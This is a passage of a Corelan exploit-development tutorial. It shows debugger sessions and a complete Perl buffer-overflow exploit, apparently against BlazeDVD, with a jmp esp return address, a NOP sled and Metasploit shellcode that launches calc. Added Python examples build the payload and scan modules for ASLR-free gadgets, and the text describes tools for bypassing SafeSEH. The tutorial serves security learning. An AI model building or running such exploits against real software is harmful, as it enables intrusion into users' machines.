Corelan Team
Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
Source : http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
Page 6

Knowledge is not an object, it's a flow

Save the environment - don't print this document !

If you want to show your respect for my work - donate : http://www.corelan.be:8800/index.php/donate/

http://www.corelan.be - Page 6 / 12
0012f620 4b 4c 4b 58 51 54 43 30-45 50 45 50 4c 4b 47 35 KLKXQTC0EPEPLKG5
0012f630 47 4c 4c 4b 43 4c 43 35-44 38 43 31 4a 4f 4c 4b GLLKCLC5D8C1JOLK

This proves that, since our breakpoint is placed at the first byte of where nseh is overwritten, a short jump of 8 bytes (minus the 2 bytes of the jump
instruction itself, so an effective jump of 6 bytes : \xeb\x06) will make the application flow jump to our shellcode.

Byakugan : findReturn
We have seen that we can also build an exploit based on a direct RET overwrite (at offset 260). Let's build a script that demonstrates how
findReturn helps us build a working exploit :
First, write a script that builds a payload made up of 264 metasploit pattern characters, followed by 1000 A's :

my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8 . . . Ai7";  # 264 byte metasploit pattern (abbreviated here)
my $junk2 = "A" x 1000;
my $payload = $junk.$junk2;

open (my $FILE, ">", $sploitfile) or die "Cannot write $sploitfile: $!";
print $FILE $payload;
close($FILE);

# write the A's to a separate file, so byakugan can track them (identBuf file)
open (my $FILE2, ">", "c:\\junk2.txt") or die "Cannot write c:\\junk2.txt: $!";
print $FILE2 $junk2;
close($FILE2);

When opening the sploitfile, windbg reports this :

(c34.7f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???

Let's use the byakugan arsenal to find all required information to build a working exploit :
● track the metasploit pattern ($junk)
● track the A's ($junk2)
● see where eip is overwritten (offset)
● see where $junk and $junk2 are
● find return addresses

0:000> !load byakugan
[Byakugan] Successfully loaded!

0:000> !jutsu identBuf msfpattern myJunk1 264
[J] Creating buffer myJunk1.

0:000> !jutsu identBuf file myJunk2 c:\junk2.txt
[J] Creating buffer myJunk2.

0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc)
Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc)

0:000> !jutsu hunt
[J] Controlling eip with myJunk1 at offset 260.
[J] Found buffer myJunk1 @ 0x0012f254
[J] Found buffer myJunk2 @ 0x0012f460
[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper!

0:000> !jutsu findReturn
[J] started return address hunt
[J] valid return address (jmp esp) found at 0x3d9572cc
[J] valid return address (call esp) found at 0x3d9bb043
[J] valid return address (jmp esp) found at 0x3d9bd376
[J] valid return address (call esp) found at 0x4b2972cb
[J] valid return address (jmp esp) found at 0x4b297591
[J] valid return address (call esp) found at 0x4b297ccb
[J] valid return address (jmp esp) found at 0x4b297f91
[J] valid return address (call esp) found at 0x4ec5c26d
[J] valid return address (jmp esp) found at 0x4ec88543
[J] valid return address (call esp) found at 0x4ece5a73
[J] valid return address (jmp esp) found at 0x4ece7267
[J] valid return address (call esp) found at 0x4ece728f
[J] valid return address (jmp esp) found at 0x4f1c5055
[J] valid return address (call esp) found at 0x4f1c50eb
[J] valid return address (jmp esp) found at 0x4f1c53b1
[J] valid return address (call esp) found at 0x4f1c5aeb
[J] valid return address (jmp esp) found at 0x4f1c5db1
[J] valid return address (jmp esp) found at 0x74751873
[J] valid return address (call esp) found at 0x7475d20f
[J] valid return address (jmp esp) found at 0x748493ab
[J] valid return address (call esp) found at 0x748820df
[J] valid return address (jmp esp) found at 0x748d5223
[J] valid return address (call esp) found at 0x755042a9
[J] valid return address (jmp esp) found at 0x75fb5700
[J] valid return address (jmp esp) found at 0x76b43adc
[J] valid return address (call esp) found at 0x77132372
[J] valid return address (jmp esp) found at 0x77156342
[J] valid return address (call esp) found at 0x77506cca
[J] valid return address (jmp esp) found at 0x77559bff
[J] valid return address (call esp) found at 0x7756e37b
[J] valid return address (jmp esp) found at 0x775a996b
[J] valid return address (jmp esp) found at 0x77963da3
[J] valid return address (call esp) found at 0x7798a67b

Corelan Team - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be/index.php/terms-of-use 12/02/2011 - 6 / 12


[J] valid return address (call esp) found at 0x77b4b543
[J] valid return address (jmp esp) found at 0x77def069
[J] valid return address (call esp) found at 0x77def0d2
[J] valid return address (jmp esp) found at 0x77e1b52b
[J] valid return address (call esp) found at 0x77eb9d02
[J] valid return address (jmp esp) found at 0x77f31d8a
[J] valid return address (call esp) found at 0x77f396f7
[J] valid return address (jmp esp) found at 0x77fab227
etc...

Results :
● eip was overwritten at offset 260 from myJunk1.
● myJunk2 (the A's) was found at 0x0012f460, which is esp-0x10 (esp was 0x0012f470 at the time of the crash). So if we replace eip with the address of a jmp esp, execution lands 16 bytes into myJunk2, and our shellcode can begin at myJunk2 + 0x10 (16 bytes).
● we need to remove the last 4 bytes from $junk in our script, and add the address (4 bytes) of a jmp esp or call esp, which will overwrite RET. (Of course, you still need to verify the address...). We'll use 0x035fb847 as an example (not shown in the output above; I still prefer to manually select the return addresses using memdump or findjmp, simply because the output of 'findReturn' does not show which module an address belongs to, and you need the module to judge whether the address is reliable).
● we need to
  ❍ replace the 1000 A's with shellcode
  ❍ add at least 16 NOPs before the shellcode (I have added 50 NOPs... if you add fewer, you may see shellcode corruption, which I easily detected using memDiff)

Script :

my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A...Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai"; # first 260 characters of the metasploit pattern (abbreviated here)
# $junk is now 4 bytes shorter, so the next 4 bytes land exactly on RET (offset 260)
my $ret = pack('V',0x035fb847); # jmp esp from EqualizerProcess.dll, packed little-endian
my $nop="\x90" x 50; # at least 16 are needed to cover the gap between myJunk2 and esp
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="\x89\xe3\xdb\xc2\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58" .
"\x51\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x47\x35\x47\x4c" .
"\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a\x4f\x4c\x4b" .
"\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b" .
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" .
"\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57" .
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44" .
"\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4a\x45\x4c\x4b" .
"\x51\x4f\x46\x44\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c" .
"\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b" .
"\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4d\x59\x51\x4c\x46\x44" .
"\x43\x34\x49\x53\x51\x4f\x46\x51\x4b\x46\x43\x50\x46\x36" .
"\x45\x34\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x51\x50\x44\x4c" .
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x42\x48\x43\x38" .
"\x4b\x39\x4a\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58" .
"\x4c\x30\x4d\x5a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b\x4e" .
"\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x43\x53\x43\x51" .
"\x42\x4c\x43\x53\x43\x30\x41\x41";

my $payload = $junk.$ret.$nop.$shellcode;

open (my $FILE, ">", $sploitfile) or die "Cannot write $sploitfile: $!";
print $FILE $payload;
close($FILE);
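The following is an added example, not part of the Corelan tutorial: a Python equivalent of what "!jutsu identBuf msfpattern" and "!jutsu hunt" compute (the cyclic pattern and the offset of the four bytes that landed in EIP), followed by the payload layout of the script above with the checks worth running before opening the file in the target. The offset (260), the esp-0x10 gap and the return address 0x035fb847 are the tutorial's values; the bad-character set (only 0x00) and the int3 stand-in shellcode are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Added example (not Corelan's script): what identBuf/hunt work out for us, then
the final payload layout of the tutorial with the checks worth running first."""
import string
import struct

RET_OFFSET = 260        # '!jutsu hunt': "Controlling eip with myJunk1 at offset 260"
ESP_GAP = 0x10          # myJunk2 was found at esp-0x10, so 'jmp esp' lands 16 bytes into it
RET_ADDR = 0x035fb847   # the jmp esp address used in the tutorial (always re-verify it)
BAD_CHARS = b"\x00"     # assumption for this example; find the real set with memDiff
# Constructed stand-in for real shellcode: int3 breakpoints, so a hit is obvious in the debugger.
SHELLCODE = b"\xcc" * 8


def msf_pattern(length):
    """Metasploit's cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    within the first 20280 bytes, which is what makes the offset lookup possible."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value):
    """Offset of the bytes now in EIP. EIP 0x37694136 is stored little-endian, so
    the bytes that overwrote it read "6Ai7" in memory order; that is the needle."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    return msf_pattern(26 * 26 * 10 * 3).find(needle)


def build_payload(shellcode=SHELLCODE, ret=RET_ADDR, nops=50):
    """$junk (260 bytes) . $ret (little-endian, like Perl pack('V')) . NOP sled . shellcode"""
    junk = msf_pattern(RET_OFFSET).encode("ascii")
    return junk + struct.pack("<I", ret) + b"\x90" * nops + shellcode


def check_layout(payload, ret=RET_ADDR):
    """Sanity checks mirroring what hunt and memDiff told us. Returns a list of problems."""
    problems = []
    if payload[RET_OFFSET:RET_OFFSET + 4] != struct.pack("<I", ret):
        problems.append("return address is not at offset %d" % RET_OFFSET)
    after_ret = payload[RET_OFFSET + 4:]
    sled = len(after_ret) - len(after_ret.lstrip(b"\x90"))
    if sled < ESP_GAP:
        problems.append("only %d NOPs, but esp points %d bytes into the buffer" % (sled, ESP_GAP))
    for b in BAD_CHARS:
        if b in payload[RET_OFFSET:]:
            problems.append("bad char 0x%02x in ret/nops/shellcode" % b)
    return problems


if __name__ == "__main__":
    print("pattern offset of EIP 0x37694136:", pattern_offset(0x37694136))
    payload = build_payload()
    print("layout problems:", check_layout(payload) or "none")
    with open("blazesploit.plf", "wb") as f:
        f.write(payload)
```

Run it and it writes blazesploit.plf like the Perl script does; swap SHELLCODE for the 302-byte windows/exec payload to reproduce the tutorial. The sled check is the memDiff lesson from the results above: esp sits 16 bytes into myJunk2, so with fewer than 16 NOPs the jmp esp lands inside the shellcode instead of in the sled.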






Page 11


This command does not require any arguments. Just run the command from the command line, and look at the ASLR / dynamicbase table for memory
locations that are not ASLR enabled/aware.
This one does not only save you time: it can mean the difference between a reliably working exploit and a one-shot exploit (one that stops working
after a reboot, because the module your return address lives in gets rebased by ASLR).
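To show what such an ASLR / dynamicbase table is derived from, here is an added example (not the plugin's code): a parser for the DllCharacteristics field of the PE optional header, whose 0x0040 bit (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) is the opt-in for ASLR and whose 0x0100 bit (NX_COMPAT) is the opt-in for DEP. The sample modules are minimal PE32 headers constructed inline (the names and bases are made up); for a real module, read the DLL file and pass its bytes to the same function.

```python
#!/usr/bin/env python3
"""Added example (not the plugin's code): read the DllCharacteristics flags a
module was linked with; this is what an 'is this module ASLR aware?' table is built from."""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # /DYNAMICBASE: image may be rebased by ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # /NXCOMPAT: image is DEP compatible
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400         # image does not use SEH; handlers in it are refused


def parse_optional_header(data):
    """Return (image_base, dll_characteristics) from the raw bytes of a PE32 or PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                       # skip signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                            # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                          # PE32+: 64-bit ImageBase at +24 (no BaseOfData)
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both layouts
    return image_base, dll_chars


def protections(data):
    """Flags a practitioner cares about when picking a module for a return address."""
    image_base, chars = parse_optional_header(data)
    return {
        "image_base": image_base,
        "aslr": bool(chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx": bool(chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
    }


def reliable_modules(modules):
    """Names of modules whose addresses survive a reboot: those without /DYNAMICBASE."""
    return [name for name, data in modules.items() if not protections(data)["aslr"]]


def constructed_pe32(image_base, dll_characteristics):
    """Minimal PE32 header, constructed for this example (parseable, not loadable)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # IMAGE_FILE_HEADER: i386, 1 section, no symbols, 224-byte optional header, EXE|32BIT|DLL
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos_header + b"PE\0\0" + file_header + bytes(opt)


# Constructed sample modules (names and bases are made up for the example).
SAMPLE_MODULES = {
    "demo_noaslr.dll": constructed_pe32(0x10000000, 0),
    "demo_aslr.dll": constructed_pe32(
        0x10000000, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
}

if __name__ == "__main__":
    import sys
    modules = dict(SAMPLE_MODULES)
    for path in sys.argv[1:]:               # optionally: real DLLs given on the command line
        with open(path, "rb") as f:
            modules[path] = f.read()
    for name, data in modules.items():
        print("%-20s %s" % (name, protections(data)))
    print("usable across reboots:", reliable_modules(modules))
```

A module without /DYNAMICBASE is loaded at its preferred ImageBase on every boot (unless it has to be relocated because of an address collision), which is why addresses taken from such a module survive reboots. Note that SafeSEH status is not in DllCharacteristics: it lives in the Load Config directory (SEHandlerTable / SEHandlerCount), so !safeseh and pvefindaddr nosafeseh need a different lookup.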

pvefindaddr
This is a small plugin I wrote myself. I will briefly discuss the following 4 operations (the current version has many more functions) :

● p : look for pop/pop/ret combinations (useful when building SEH based exploits). It automatically filters out the modules that are safeseh protected, so the addresses you get are not safeseh protected. Furthermore, it automatically tries all combinations and looks in all loaded modules, so you don't have to specify a register or module. If you specify a register, it will only show combinations where that register is used. If you specify a register and a module name, you will obviously get all combinations where this register is used, and only from the specified module (even if that module is safeseh protected !)
● j : look for all jmp/call/push ret combinations (useful when building direct ret overwrite exploits). You have to specify the register to jump to, and can optionally specify a module name
● jseh : this operation is useful when bypassing safeseh protections (see tutorial series part 6). Again, this operation searches for all combinations automatically
● nosafeseh : show all currently loaded modules that are not safeseh protected
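The following is an added example, not part of the Corelan tutorial and not the code of Byakugan or pvefindaddr: it shows the core of what findReturn (in the windbg session above) and the p and j operations of pvefindaddr do, namely scanning the bytes of loaded modules for the opcode sequences jmp reg / call reg / push reg; ret and pop/pop/ret, turning hits into absolute addresses, dropping addresses whose encoding contains a bad character (assumed here to be just 0x00), and skipping SafeSEH modules for pop/pop/ret unless a module is named explicitly. The module names, bases, images and safeseh flags are constructed for the example; a real implementation reads them from the debugger.

```python
#!/usr/bin/env python3
"""Added example (not Byakugan or pvefindaddr): scan module images for the
instruction sequences a return address must point at."""
import re
import struct

# x86 register numbers as used in the ModRM / opcode encodings below
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# pop r32 (58+r), pop r32, then ret (C3) or ret imm16 (C2 xx xx); the lookahead makes
# finditer report overlapping candidates such as pop/pop/pop/ret.
POP_POP_RET = re.compile(rb"(?=([\x58-\x5f][\x58-\x5f](?:\xc3|\xc2[\x00-\xff]{2})))")


def jump_sequences(reg):
    """Opcode bytes that transfer control to the address held in `reg`."""
    r = REGS.index(reg)
    return {
        "jmp " + reg: bytes([0xFF, 0xE0 | r]),            # FF /4, ModRM 11 100 rrr (jmp esp = FF E4)
        "call " + reg: bytes([0xFF, 0xD0 | r]),           # FF /2, ModRM 11 010 rrr (call esp = FF D4)
        "push " + reg + "; ret": bytes([0x50 | r, 0xC3]),  # 50+r, C3
    }


def usable(addr, bad_chars):
    """False if the little-endian encoding of the address contains a bad character."""
    return not any(b in bad_chars for b in struct.pack("<I", addr))


def describe_ppr(seq):
    pops = ["pop " + REGS[b - 0x58] for b in seq[:2]]
    ret = "ret" if seq[2] == 0xC3 else "ret 0x%x" % struct.unpack("<H", seq[3:5])[0]
    return "; ".join(pops + [ret])


def find_jumps(modules, reg, bad_chars=b"\x00"):
    """pvefindaddr j / findReturn: every jmp/call/push-ret to `reg` in all modules."""
    hits = []
    for mod in modules:
        for name, seq in jump_sequences(reg).items():
            pos = mod["image"].find(seq)
            while pos >= 0:
                addr = mod["base"] + pos
                if usable(addr, bad_chars):
                    hits.append((addr, name, mod["name"]))
                pos = mod["image"].find(seq, pos + 1)
    return sorted(hits)


def find_pop_pop_ret(modules, module=None, bad_chars=b"\x00"):
    """pvefindaddr p: pop/pop/ret in non-SafeSEH modules, or in one named module regardless
    of its SafeSEH status (a handler address inside a SafeSEH module would be rejected)."""
    hits = []
    for mod in modules:
        if module is None and mod["safeseh"]:
            continue
        if module is not None and mod["name"] != module:
            continue
        for m in POP_POP_RET.finditer(mod["image"]):
            addr = mod["base"] + m.start()
            if usable(addr, bad_chars):
                hits.append((addr, describe_ppr(m.group(1)), mod["name"]))
    return sorted(hits)


def constructed_image():
    """Stand-in for a loaded module's bytes: zero filler with known sequences planted."""
    img = bytearray(0x100)
    img[0x20:0x22] = b"\xff\xe4"               # jmp esp
    img[0x40:0x42] = b"\xff\xd4"               # call esp
    img[0x60:0x62] = b"\x54\xc3"               # push esp; ret
    img[0x80:0x83] = b"\x5e\x5b\xc3"           # pop esi; pop ebx; ret
    img[0xa0:0xa5] = b"\x58\x5d\xc2\x04\x00"   # pop eax; pop ebp; ret 4
    return bytes(img)


# Constructed module table (names, bases and flags are made up for the example).
MODULES = [
    {"name": "demo_a.dll", "base": 0x3d951000, "safeseh": False, "image": constructed_image()},
    {"name": "demo_exe.exe", "base": 0x00401000, "safeseh": False, "image": constructed_image()},
    {"name": "demo_safe.dll", "base": 0x4b291000, "safeseh": True, "image": constructed_image()},
]

if __name__ == "__main__":
    for addr, what, mod in find_jumps(MODULES, "esp"):
        print("valid return address (%s) found at 0x%08x in %s" % (what, addr, mod))
    for addr, what, mod in find_pop_pop_ret(MODULES):
        print("pop/pop/ret (%s) found at 0x%08x in %s" % (what, addr, mod))
```

Every hit from demo_exe.exe is silently dropped because its addresses start with a null byte, which is the usual reason the main executable is useless as a source of return addresses in string-based overflows; the jmp esp hits in demo_safe.dll are kept, since SafeSEH only matters for SEH handler addresses.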

Download/more info : http://www.corelan.be:8800/index.php/security/pvefindaddr-py-immunity-debugger-pycommand/
Other pycommands & command syntax
In order to get more info on how to use the pycommands, simply run the pycommand from the command line without arguments, open the Log Data
window and you'll get a short help text indicating the parameters that need to be provided in order to correctly run the script.

Other commands will simply open a nice wizard when they are launched without parameters (such as the !antidep command), and others will just
throw an exception :-(
More information about immdbg and pycommands can be found in Immunity's "Intelligent Debugging" paper (http://www.immunitysec.com/downloads/IntelligentDebugging.pdf) and the "Debugging with ID" slides (http://www.immunitysec.com/downloads/Debugging_With_ID.odp)
(ImmDbg has a lot of cool scripts to help with heap based exploit development, which is out of scope for this article right now)
Happy hunting !

Some other cool stuff in immdbg
!packets
Allows you to capture packets from the wire and get the function that was responsible for sending/receiving the packets. Example : open Firefox and
attach immdbg to the process. Before releasing Firefox from the breakpoint the debugger imposes on attach, launch !packets.
Continue to run Firefox and navigate to a website. Now go back to immdbg and observe the "Captured Packets" window :


Page 12


!safeseh
This command will list the executable modules and indicate whether they are safeseh protected or not. After running the !safeseh command, you need
to open the “Log Data” window to see the results.

Copyright secured by Digiprove © 2010 Peter Van Eeckhoutte

This entry was posted on Saturday, September 5th, 2009 at 11:35 am and is filed under 001_Security, Exploit Writing Tutorials, Exploits